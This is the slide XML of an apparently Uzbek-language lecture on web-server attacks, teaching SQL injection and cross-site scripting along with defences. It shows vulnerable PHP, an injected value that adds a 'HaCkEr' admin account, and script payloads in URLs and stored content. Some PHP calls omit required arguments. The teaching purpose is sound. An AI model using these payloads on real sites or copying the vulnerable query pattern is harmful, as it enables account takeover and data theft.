            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$id = $_REQUEST['id'];</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$res = mysqli_query("SELECT * FROM news WHERE id_news = $id");</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>id o'zgaruvchiga </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>quyidagi qiymat jo'natilsa: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	12;INSERT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>INTO admin (username, password) VALUES ('HaCkEr', 'foo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>SELECT * FROM news WHERE id_news = 12;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>INSERT INTO admin (username, password) VALUES ('HaCkEr', 'foo');</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Bunda buzg'unchi admin jadvaliga o'zi uchun username va password qo'shish imkoniga ega bo'ladi.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3932876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SQL-Injection</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845734"/>
            <a:ext cx="10058400" cy="4520560"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Himoyalanish sifatida quyidagilarni keltirish mumkin.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Kiruvchi parametrlarni </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>filtrlash. Masalan, satr uchun mysqli_real_escape_string funksiya yordamida, butun son uchun int turiga o'tkazish orqali va h.k.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$query = "SELECT * FROM users WHERE user='" . mysqli_real_escape_string($user) . "';";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="50000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>$query = 'SELECT * FROM users WHERE id = ' . (int)$id;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Parametrli so'rovlardan foydalanish orqali. PHP da MySQLi (prepare metodi) yoki PDO yordamida.</a:t>
            </a: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p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2418408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algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="5000" b="1" smtClean="0"/>
              <a:t>Savollar?</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" sz="5000" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Подзаголовок 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1100051" y="4455620"/>
            <a:ext cx="10058400" cy="1796899"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r"/>
            <a:endParaRPr lang="ru-RU" sz="2600" cap="none" spc="-50">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mj-ea"/>
              <a:cs typeface="+mj-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Rectangle 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="370533"/>
            <a:ext cx="12192000" cy="492443"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="2600" b="1">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2438002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Web-server strukturasi</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1"/>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6329968"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="1088337" y="2665772"/>
          <a:ext cx="10058400" cy="3674645"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr firstRow="1" bandRow="1">
                <a:tableStyleId>{5940675A-B579-460E-94D1-54222C63F5DA}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2011680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2422111907"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2011680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="718249306"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2011680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1820366308"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2011680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="3742376068"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
                <a:gridCol w="2011680">
                  <a:extLst>
                    <a:ext uri="{9D8B030D-6E8A-4147-A177-3AD203B41FA5}">
                      <a16:colId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2828718506"/>
                    </a:ext>
                  </a:extLst>
                </a:gridCol>
              </a:tblGrid>
              <a:tr h="734929">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" smtClean="0"/>
                        <a:t>Blog</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="768664"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" smtClean="0"/>
                        <a:t>Fotogalereya</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="768664"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" smtClean="0"/>
                        <a:t>CMS</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:srgbClr val="768664"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" smtClean="0"/>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" smtClean="0"/>
                        <a:t> sayt 3</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx2">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc rowSpan="4">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" smtClean="0"/>
                        <a:t>Web-xizmatlar: DNS, FTP,</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" smtClean="0"/>
                        <a:t> SMTP va boshqalar</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="996947548"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="7349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Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" smtClean="0"/>
                        <a:t> sayt 1</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx2">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="4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mtClean="0"/>
                        <a:t>Web</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" smtClean="0"/>
                        <a:t> sayt 2</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" smtClean="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx2">
                        <a:lumMod val="60000"/>
                        <a:lumOff val="40000"/>
                      </a:schemeClr>
                    </a:solidFill>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74400437"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="734929">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" smtClean="0"/>
                        <a:t>Server kengaytmalari</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx2">
                        <a:lumMod val="40000"/>
                        <a:lumOff val="60000"/>
                      </a:schemeClr>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc rowSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" smtClean="0"/>
                        <a:t>BBBT server</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">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4164396517"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="734929">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" smtClean="0"/>
                        <a:t>HTTP server</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr">
                    <a:solidFill>
                      <a:schemeClr val="tx2">
                        <a:lumMod val="20000"/>
                        <a:lumOff val="80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34256501"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="734929">
                <a:tc gridSpan="5">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="en-US" smtClean="0"/>
                        <a:t>Operatsion</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" baseline="0" smtClean="0"/>
                        <a:t> tizim</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US"/>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85217058"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="TextBox 4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1854679"/>
            <a:ext cx="10058400" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web server bir qancha dasturiy ta'minotlar qatlamlaridan shakllanadi. Ularning har biri turli hujumlarga uchrashi mumkin.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2408877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Web-serverga hujumlar</a:t>
            </a:r>
            <a:endParaRPr lang="ru-RU" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1811230"/>
            <a:ext cx="10058400" cy="4511934"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web-serverga hujumlarni 2 kategoriyaga bo'lish mumkin:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" indent="-180975">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Lokal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>hujumlar. Odatda alohida web-serverda boshqaruvni tutib olish yoki ma'lumotlarni o'g'irlashga yo'naltirilgan bo'ladi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="630238" indent="-180975">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>Global </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>hujumlar. Odatda bir qancha web-saytlarga yo'naltiriladi va ularning barcha tashrif buyuruvchilarini "buzish"ga yo'naltirilgan bo'ladi. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web serverlar quyidagi hujum turlari orqali "buzilishi" mumkin:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="534988" indent="-90488">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross-Site Scripting </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="534988" indent="-90488">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Cross Site Request Forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="534988" indent="-90488">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>SQL-Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="534988" indent="-90488">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Zararli reklama</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="534988" indent="-90488">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Dasturiy ta'minotlarning zaif tomonlari orqali va boshqalar</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2333151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286603"/>
            <a:ext cx="10058400" cy="5582491"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Dasturchi "Ilova qatlami"ga (Application Layer) bo'lgan hujumni to'xtatishda "Tarmoq qatlami" himoya vositalaridan (firewall, SSL, IDS va boshqalar) foydalana olmaydi.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1488793" y="1324468"/>
            <a:ext cx="9275373" cy="5065892"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3267781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Cross-Site Scripting (XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1097280" y="1845734"/>
            <a:ext cx="10058400" cy="4718968"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Web tizim taqdim etayotgan sahifaga "zarar beruvchi kod"ni joylash va uni web-serverda ishga tushurishga asoslangan hujum turi.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Doimiy bo'lmagan hujum: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>://example.com/search.php?q=&lt;script&gt;DoSomething();&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	Bunda </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>dasturchi "&lt;" va "&gt;" belgilarni "&amp;lt;" va</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>gt;" ko'rinishiga o'tkazishni unutgan bo'lsa </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	sahifada </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>bajariladi. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="600"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2100"/>
              <a:t>Doimiy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t> bo'lgan hujum:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>script&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="361950">
              <a:lnSpc>
                <a:spcPct val="110000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>	document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US"/>
